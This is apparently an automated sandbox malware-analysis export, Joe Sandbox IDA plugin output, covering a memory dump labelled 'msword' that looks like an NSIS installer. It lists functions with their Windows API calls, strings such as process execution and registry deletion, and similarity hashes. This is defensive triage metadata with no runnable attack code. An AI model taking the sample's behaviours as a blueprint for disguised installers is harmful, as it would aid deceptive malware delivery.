Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
API String ID: 1033533793-945480824
Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: failed createprocess ("%s"), xrefs: 004022C2
Exec: success ("%s"), xrefs: 00402263
Exec: command="%s", xrefs: 00402241

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D

Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
GetMessagePos.USER32 ref: 00404871
ScreenToClient.USER32(?,?), ref: 00404889
SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1

Strings

f, xrefs: 0040489D

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00022000,00000064,?), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58

Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
wsprintfW.USER32 ref: 00404457
SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A

Strings

@rD, xrefs: 00404402
%u.%u%s%s, xrefs: 00404444

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$@rD
API String ID: 3540041739-1813061909
Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679

Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
CharNextW.USER32(?,?,?,00000000), ref: 004060AA
CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Strings

*?|<>/":, xrefs: 0040608A

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

GlobalFree.KERNEL32(007F0458), ref: 00402387

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
DeleteRegKey: "%s\%s", xrefs: 00402843

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D

Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404902
CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Strings

, xrefs: 004048DA
@rD, xrefs: 00404934

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID: $@rD
API String ID: 3748168415-881980237
Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59

Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00406278
lstrcatW.KERNEL32(00000000,...), ref: 0040629B

Strings

%02x%c, xrefs: 00406270
..., xrefs: 00406293

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794

Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405057

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

OleUninitialize.OLE32(00000404,00000000), ref: 004050A5

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

Skipping section: "%s", xrefs: 004050B5
Section: "%s", xrefs: 00405079

Memory Dump Source

